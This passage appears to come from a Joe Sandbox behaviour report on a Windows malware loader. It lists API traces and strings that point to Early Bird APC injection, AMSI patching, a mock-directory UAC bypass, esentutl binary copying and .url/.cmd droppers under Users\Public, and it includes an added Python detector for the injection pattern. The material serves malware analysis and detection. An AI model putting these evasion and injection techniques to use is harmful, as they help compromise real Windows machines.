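Both checks are deliberately narrow: a .url pointing at https:// and an esentutl /y that copies a database into a backup directory under its own name return None, so the signal is the combination of the report's strings (file: target under Users\Public, a System32 binary copied under a new name) rather than the presence of esentutl or a .url file alone.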

                                                           Control-flow Graph (rendered graph; the basic blocks, their non-helper calls and edges recovered from the graph text)

                                                           • Executed
                                                           • Not Executed
                                                           • Helper sequence repeated throughout: call 28f4860, call 28f49a0, call 28f46d4, call 28f47ec, call 28f49a0, call 28f46d4, call 29089d0
                                                           • Block 4574, 2918128-2918517: helper sequence x8, call 28f48ec; edges to 4689 and 4690
                                                           • Block 4690, 291851d-29186f0: helper sequence x3, call 28f47ec, call 28f49a0, call 28f4d74, call 28f4df0, CreateProcessAsUserW; edges to 4797 and 4798
                                                           • Block 4797, 29186f2-2918769: helper sequence; edge to 4798
                                                           • Block 4798, 291876e-2918879: helper sequence x2; edges to 4899 and 4900
                                                           • Block 4900, 291887b-291887e; edge to 4899
                                                           • Block 4899, 2918880-2918ba0: call 28f49f8, call 290de50, helper sequence x3, call 290d164, helper sequence x3; edges to 5217 and 5218
                                                           • Block 5217, 2918ba2-2918bb4: call 2908730; edge to 5218
                                                           • Block 5218, 2918bb9-291939c: helper sequence x3, ResumeThread, helper sequence x3, CloseHandle, helper sequence x7, call 2908080, call 290894c x6, CloseHandle, helper sequence x2; edge to 4689
                                                           • Block 4689, 29193a1-2919524: helper sequence x3, call 28f48ec; edges to 4779 and 4780
                                                           • Block 4780, 291952a-2919539: call 28f48ec; edges to 4779 and 4788
                                                           • Block 4788, 291953f-2919812: helper sequence x3, call 290f094, call 28f4860, call 28f49a0, call 28f46d4, helper sequence x2, call 28f7e5c; edges to 5046 and 5047
                                                           • Block 5046, 2919818-2919aea: helper sequence x3, call 290e358, call 28f4530, helper sequence x2, call 28f4de0 x2, call 28f4764, call 290dc8c; edge to 5047
                                                           • Block 5047, 2919aef-2919cf0: helper sequence x4, call 28f49f8, call 2908d70; edge to 4779
                                                           • Block 4779, 2919cf5-291b2fa: helper sequences interleaved with call 28f46d4 x2 / call 29089d0 pairs, call 2907c10, call 2908338, helper sequence x3, ExitProcess
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A6B7E0,02A6B824,OpenSession,02977380,0291B7B8,UacScan,02977380), ref: 029186E9
                                                          • ResumeThread.KERNEL32(00000880,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8), ref: 02918D33
                                                            • Part of subcall function 02908730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02908761
                                                          • CloseHandle.KERNEL32(00000898,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,00000880,ScanBuffer,02977380,0291B7B8,OpenSession,02977380), ref: 02918EB2
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          • CloseHandle.KERNEL32(00000898,00000898,ScanBuffer,02977380,0291B7B8,UacInitialize,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380), ref: 029192A4
                                                            • Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                            • Part of subcall function 0290DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DD5E), ref: 0290DCCB
                                                            • Part of subcall function 0290DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DD05
                                                            • Part of subcall function 0290DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DD32
                                                            • Part of subcall function 0290DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DD3B
                                                            • Part of subcall function 02908338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029083C2), ref: 029083A4
                                                          • ExitProcess.KERNEL32(00000000,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,Initialize,02977380,0291B7B8,00000000,00000000,00000000,ScanString,02977380,0291B7B8), ref: 0291B2FA
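The API list above is the Early Bird sequence the report flags: CreateProcessAsUserW with dwCreationFlags 00000004 (CREATE_SUSPENDED, the seventh argument), NtQueueApcThread from subcall 02908730 against the suspended process, then ResumeThread on handle 00000880. The Python below is an added example and not part of the Joe Sandbox report: it parses the report's "APIs" bullet format and checks a function's listing for that pattern. The sample input is copied from the listing for function 02918128; the table of dwCreationFlags positions and the sets of APC-queue and resume APIs come from the Win32 signatures and are assumptions of this example. The check is order-independent on purpose, because listing order is not execution order (the NtQueueApcThread subcall is listed after ResumeThread, while the control-flow graph places call 2908730 in the block before ResumeThread).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

CREATE_SUSPENDED = 0x00000004

# 0-based position of dwCreationFlags in each CreateProcess variant (from the
# Win32 signatures; an assumption of this example, not taken from the report).
CREATION_FLAGS_INDEX: Dict[str, int] = {
    "CreateProcessA": 5, "CreateProcessW": 5,
    "CreateProcessAsUserA": 6, "CreateProcessAsUserW": 6,
    "CreateProcessWithLogonW": 6, "CreateProcessWithTokenW": 4,
}
APC_QUEUE_APIS = {"NtQueueApcThread", "NtQueueApcThreadEx", "ZwQueueApcThread", "QueueUserAPC"}
RESUME_APIS = {"ResumeThread", "NtResumeThread", "ZwResumeThread", "NtAlertResumeThread"}

# One 'APIs' bullet: [Part of subcall function X: ]Api.MODULE(args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: the bullets for function 02918128 copied from the listing above.
SAMPLE_LISTING = """\
• Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A6B7E0,02A6B824,OpenSession,02977380,0291B7B8,UacScan,02977380), ref: 029186E9
• ResumeThread.KERNEL32(00000880,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8), ref: 02918D33
• Part of subcall function 02908730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02908761
• CloseHandle.KERNEL32(00000898,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,00000880,ScanBuffer,02977380,0291B7B8,OpenSession,02977380), ref: 02918EB2
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall: Optional[str]   # function the call was reported from, if a subcall


def parse_listing(text: str) -> List[ApiCall]:
    """Parse the report's 'APIs' bullets into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub")))
    return calls


def hex_arg(args: Tuple[str, ...], idx: int) -> Optional[int]:
    """args[idx] as an int, or None when the argument is missing or unresolved ('?')."""
    if idx >= len(args):
        return None
    try:
        return int(args[idx], 16)
    except ValueError:
        return None


def find_early_bird(calls: List[ApiCall]) -> Optional[Dict[str, str]]:
    """Return the refs of a suspended CreateProcess*, an APC queue call and a resume call, or None."""
    suspended = next((c for c in calls
                      if c.api in CREATION_FLAGS_INDEX
                      and (hex_arg(c.args, CREATION_FLAGS_INDEX[c.api]) or 0) & CREATE_SUSPENDED), None)
    apc = next((c for c in calls if c.api in APC_QUEUE_APIS), None)
    resume = next((c for c in calls if c.api in RESUME_APIS), None)
    if not (suspended and apc and resume):
        return None
    return {"create": suspended.ref, "queue_apc": apc.ref, "resume": resume.ref}


if __name__ == "__main__":
    print(find_early_bird(parse_listing(SAMPLE_LISTING)))
```

An unresolved flags argument ("?") is treated as not suspended rather than guessed, so the check under-reports instead of flagging every CreateProcess* paired with a ResumeThread; a listing that has the APC call but no CREATE_SUSPENDED bit is left for a human to read.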
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileLibrary$CreateFreeHandlePathProcessThread$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcQueueResumeUserWrite
                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                          • API String ID: 2961332323-3516509641
                                                          • Opcode ID: 8c24e894eb3a9a7e3b7fd534bc5d069f1de5bc0e150b3fb78bef48dc1d9bd537
                                                          • Instruction ID: 5acd7abd846d587d2c65e8a47d5222764900eccf368c34b383505d2362d13297
                                                          • Opcode Fuzzy Hash: 8c24e894eb3a9a7e3b7fd534bc5d069f1de5bc0e150b3fb78bef48dc1d9bd537
                                                          • Instruction Fuzzy Hash: D543EA3DB0821D8FDB50EB68DC909DB73FAEF85304F5040E6A209DB650DA31AE958F56
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 0290DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DD5E), ref: 0290DCCB
                                                            • Part of subcall function 0290DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DD05
                                                            • Part of subcall function 0290DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DD32
                                                            • Part of subcall function 0290DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DD3B
                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02977380,0291B7B8,UacScan,02977380,0291B7B8,ScanString,02977380,0291B7B8,0291BB30,00000000,00000000,0291BB24,00000000,00000000), ref: 029140CB
                                                            • Part of subcall function 029088B8: LoadLibraryW.KERNEL32(amsi), ref: 029088C1
                                                            • Part of subcall function 029088B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02908920
                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,000003E8,ScanBuffer,02977380,0291B7B8,UacScan,02977380), ref: 02914277
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          • Sleep.KERNEL32(00004E20,UacScan,02977380,0291B7B8,ScanString,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacInitialize,02977380,0291B7B8), ref: 029150EE
                                                            • Part of subcall function 0290DC04: RtlI.N(?,?,00000000,0290DC7E), ref: 0290DC2C
                                                            • Part of subcall function 0290DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC42
                                                            • Part of subcall function 0290DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC61
                                                            • Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                            • Part of subcall function 029085BC: WinExec.KERNEL32(?,?), ref: 02908624
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                          • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                          • API String ID: 2171786310-3926298568
                                                          • Opcode ID: 6b7c80581b235beea5813700c00043efe5a57d795be6aed2126d45e01f548154
                                                          • Instruction ID: 947ac00978219be6c8778b7d5994085115c0fca30f9c8694535310c850d17292
                                                          • Opcode Fuzzy Hash: 6b7c80581b235beea5813700c00043efe5a57d795be6aed2126d45e01f548154
                                                          • Instruction Fuzzy Hash: F343F83DB0425D8FEB50EB68DC90A9F73B6BF85304F1040E29609EB650DE70AE859F56

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 02908788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02977380,0290EF4C,OpenSession,02977380,0290EF4C,UacScan,02977380,0290EF4C,ScanBuffer,02977380,0290EF4C,OpenSession,02977380), ref: 0290ED6E
                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02977380,0290EF4C,OpenSession,02977380,0290EF4C,UacScan,02977380,0290EF4C,ScanBuffer,02977380,0290EF4C,OpenSession), ref: 0290ED76
                                                          • CloseHandle.KERNEL32(00000888,00000000,00000000,000000FF,ScanString,02977380,0290EF4C,OpenSession,02977380,0290EF4C,UacScan,02977380,0290EF4C,ScanBuffer,02977380,0290EF4C), ref: 0290ED7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                          • String ID: )"C:\Users\Public\Libraries\ahhbgzzQ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                          • API String ID: 3475578485-2037326086
                                                          • Opcode ID: c14913eca61be49beb611f706e374e0fd120e7b2d148ba03989e956598848f50
                                                          • Instruction ID: ba6a212c4c08a01851235256db24bbd65cbfcb34e1bd54de92e0de914907eccd
                                                          • Opcode Fuzzy Hash: c14913eca61be49beb611f706e374e0fd120e7b2d148ba03989e956598848f50
                                                          • Instruction Fuzzy Hash: D222CA7CB0015D9FEB50FB68D881B8FB3B6AF85300F1045A2A745EB294DB70AE458F56

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,028F1FC1), ref: 028F17D0
                                                          • Sleep.KERNEL32(0000000A,00000000,?,028F1FC1), ref: 028F17E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 3d82bec10518446a4c0f6a35c6a6498bb83fe99ff171641165d70dc4bd178faf
                                                          • Instruction ID: 108eedd839c46c5f21c77f5b33007e2a30dbdd72528c6070de02c6811806eaa4
                                                          • Opcode Fuzzy Hash: 3d82bec10518446a4c0f6a35c6a6498bb83fe99ff171641165d70dc4bd178faf
                                                          • Instruction Fuzzy Hash: 07B1307EA05340CBCB55CF68D888321BBF1EB86325F1986AAD64DCB386C7309465CB91

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryW.KERNEL32(amsi), ref: 029088C1
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02908920
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                          • String ID: DllGetClassObject$W$amsi
                                                          • API String ID: 941070894-2671292670
                                                          • Opcode ID: 11d1203213038b62e66b751a7759d8023dab7ba946693674731901a15ae87a99
                                                          • Instruction ID: 5304492c24857255eb4112d83a6ecb6708013a8ebde0444ee7e4d5db95f466f8
                                                          • Opcode Fuzzy Hash: 11d1203213038b62e66b751a7759d8023dab7ba946693674731901a15ae87a99
                                                          • Instruction Fuzzy Hash: 4BF0815054C385BDD200E2B88C89F4BBBCD4BA2264F008A18B1A89A2D2D679D1458777

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,?,00000000,028F1FE4), ref: 028F1B17
                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028F1FE4), ref: 028F1B31
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 53e987e99ac2e53048e1fe2ef9f792d8b82bf7467ff58d178b226a6e73b8f3ff
                                                          • Instruction ID: 4e415e5d6733ba590a5dd5fc5df75005f805223d67cfc53b855cabce7fd777fe
                                                          • Opcode Fuzzy Hash: 53e987e99ac2e53048e1fe2ef9f792d8b82bf7467ff58d178b226a6e73b8f3ff
                                                          • Instruction Fuzzy Hash: 6251B07D605240CFD795CF6CC988766BBE0AB46328F1885AED64CCB286E770C445CBA2

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E5F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CheckConnectionInternet
                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                          • API String ID: 3847983778-3852638603
                                                          • Opcode ID: 32b18cc4e2eb5b705ec04cbbe1e2b4baba3406ad6b5f0ded82a98649195de124
                                                          • Instruction ID: de7d45e613eade656e24e95e0267b55e15c626deaa44a8899ce778ce645aca10
                                                          • Opcode Fuzzy Hash: 32b18cc4e2eb5b705ec04cbbe1e2b4baba3406ad6b5f0ded82a98649195de124
                                                          • Instruction Fuzzy Hash: 8141133DB1010D9FEB41EBA8D881ADF73FAEF88700F104426E641E7291DA75AD018F56
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
